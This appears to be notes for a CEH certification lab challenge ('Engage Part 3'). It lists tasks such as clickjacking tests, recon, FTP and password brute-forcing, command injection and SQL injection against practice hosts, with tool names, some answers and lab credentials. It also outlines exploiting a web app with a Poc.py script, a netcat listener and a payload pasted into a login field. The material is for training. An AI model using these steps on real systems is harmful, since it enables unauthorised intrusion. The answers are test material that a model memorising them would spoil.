3️⃣CEH Engage Part 3
You have been assigned a task to perform a clickjacking test on www.certifiedhacker.com that the CEHORG members widely use. Find out whether the site is vulnerable to clickjacking.
GhostEye
Nikto
Perform an HTTP-recon on www.certifiedhacker.com and find out the version of Nginx used by the web server.
BillCipher
Whatweb
An FTP site is hosted on a machine in the CEHORG network. Crack the FTP credentials, obtain the “flag.txt” file and determine the content in the file.
Perform web application reconnaissance on movies.cehorg.com and find out the HTTP server used by the web application.
Whatweb
Nmap
Identify the load balancing service used by eccouncil.org.
-> cloudflare
Identify the Content Management System used by www.cehorg.com.
Perform a bruteforce attack on www.cehorg.com and find the password of user adam.
Perform parameter tampering on movies.cehorg.com and find out the user for id 1003.
Type the username as "Jason" and password as "welcome"
We found this username and password in the engage part 2. While dumping the wireshark capture data. REMEMBER?
You have identified a vulnerable web application on a Linux server at port 8080. Exploit the web application vulnerability, gain access to the server and enter the content of RootFlag.txt as the answer.
Extract and Setup Jdk
Update the JDK Path in the Poc.py file
Change Line no: 62, replace jdk1.8.0_20/bin/javac with "/usr/bin/jdk1.8.0_202/bin/javac"
Change Line no: 87, replace jdk1.8.0_20/bin/java with "/usr/bin/jdk1.8.0_202/bin/java" Change Line no: 99, replace jdk1.8.0_20/bin/java with "/usr/bin/jdk1.8.0_202/bin/java"
Create a Netcat Listener
Create a Payload
Copy the send me payload and paste in the username field and enter any random password and press Login
Perform command injection attack on 10.10.10.25 and find out how many user accounts are registered with the machine. Note: Exclude admin/Guest user
A file named Hash.txt has been uploaded through DVWA (http://10.10.10.25:8080/DVWA). The file is located in the directory mentioned below. Access the file and crack the MD5 hash to reveal the original message; enter the content after cracking the hash. You can log into the DVWA using the following credentials. Note: Username- admin; Password- password Path: C:\wamp64\www\DVWA\hackable\uploads\Hash.txt Hint: Use “type” command to view the file. Use the following link to decrypt the hash- https://hashes.com/en/decrypt/hash
Perform Banner grabbing on the web application movies.cehorg.com and find out the ETag of the respective target machine.
Perform Web Crawling on the web application movies.cehorg.com and identify the number of live png files in images folder.
Perform XSS vulnerability test on www.cehorg.com and identify whether the application is vulnerable to attack or not. (Yes/No).
-> No
PwnXSS
OWASP ZAP
Perform a SQL Injection attack on movies.cehorg.com and find out the number of users available in the database. Use Jason/welcome as login credentials.
Get Database
Get Tables
Get number of Users available
Dump Table Data
Dump Databases
CEHORG suspects of a possible session hijacking attack on a machine in its network. The organisation has retained the network traffic data for the session at C:\Users\Admin\Documents in the EH Workstation – 2 as sniffsession.pcap. You have been assigned a task to perform an analysis and find out the protocol that has been used for sniffing on its network.
Last updated
